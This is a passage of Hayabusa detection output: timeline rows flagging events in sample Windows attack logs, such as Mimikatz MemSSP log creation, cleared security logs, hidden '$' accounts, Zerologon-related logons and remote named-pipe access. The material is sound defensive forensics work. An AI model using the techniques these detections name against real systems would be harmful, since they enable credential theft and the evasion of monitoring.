C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 6556 | PGUID: 747F3D96-93D3-5F53-3802-00000000E500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1008 | PGUID: 747F3D96-130C-5F54-1300-00000000E600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,,Logon Failure - Wrong Password,User: IEUser | Type: 2 | Computer: MSEDGEWIN10 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-66F7-5F5A-0500-00000000F600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-11 21:10:22.398 +09:00,MSEDGEWIN10,11,info,,File Created,Path: 
C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 640 | PGUID: 747F3D96-672C-5F5B-0D00-00000000FC00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx +2020-09-11 21:10:22.398 +09:00,MSEDGEWIN10,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,../hayabusa-rules/sigma/file_event/file_event_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx +2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-14 23:44:14.393 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-14 23:46:33.690 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-14 23:48:28.683 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Evas,Security Log Cleared,User: 
IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: svc01 | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\inetsrv\w3wp.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,Evas,System Log File Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx +2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff6e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 
0x31ff89,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107103,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,../hayabusa-rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! 
(Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107104,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,../hayabusa-rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: 02694W-WIN10 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x853237,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-20 06:12:15.920 +09:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 
83989F29-0ADD-5F61-0B00-00000000FE00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx +2020-09-20 06:12:15.920 +09:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx +2020-09-20 06:14:32.852 +09:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx +2020-09-20 06:14:32.852 +09:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx +2020-09-21 06:22:24.799 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Local Admin Password Setting Changed | SetValue: 
HKLM\SAM\SAM\Domains\Account\Users\000001F4\ForcePasswordReset: Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-C6C1-5F67-0000-0010A65D0000,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon_13_Local_Admin_Password_Changed.evtx +2020-09-24 01:49:26.469 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52246 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:49:41.578 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 3276 | PGUID: 83989F29-7CA8-5F6B-1201-000000000301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} | Process: 
C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 7096 | PGUID: 83989F29-7CA8-5F6B-1301-000000000301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1136e95,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.703 +09:00,01566s-win16-ir.threebeesco.com,18,medium,,Pipe Connected_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 | Process: C:\Windows\System32\WerFault.exe | 
User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted | LID: 0x3e5 | PID: 6868 | PGUID: 83989F29-7CC8-5F6B-2101-000000000301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1137987,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:18.302 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50106 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:18.302 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50107 (-) | Dst: 172.16.66.36:445 
(01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\wermgr.exe -upload | Process: C:\Windows\System32\wermgr.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 4248 | PGUID: 83989F29-7CCB-5F6B-2301-000000000301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:27.599 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52249 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:45.506 +09:00,01566s-win16-ir.threebeesco.com,17,medium,,Pipe Created_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: C:\Windows\System32\svchost.exe | PID: 6924 | PGUID: 83989F29-7CC9-5F6B-2201-000000000301,../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:51:27.552 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52264 (01566s-win16-ir.threebeesco.com) | 
Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-27 22:19:54.244 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.250 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.257 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.264 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.272 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\atsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.286 
+09:00,MSEDGEWIN10,18,info,,Pipe Connected,\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.293 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\eventlog | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.299 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\InitShutdown | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.314 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.322 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\LSM_API_service | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.328 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.343 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 
747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.350 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\ROUTER | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.364 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\scerpc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.371 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.377 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\tapsrv | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.385 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\trkwks | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.399 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: System | PID: 4 | PGUID: 
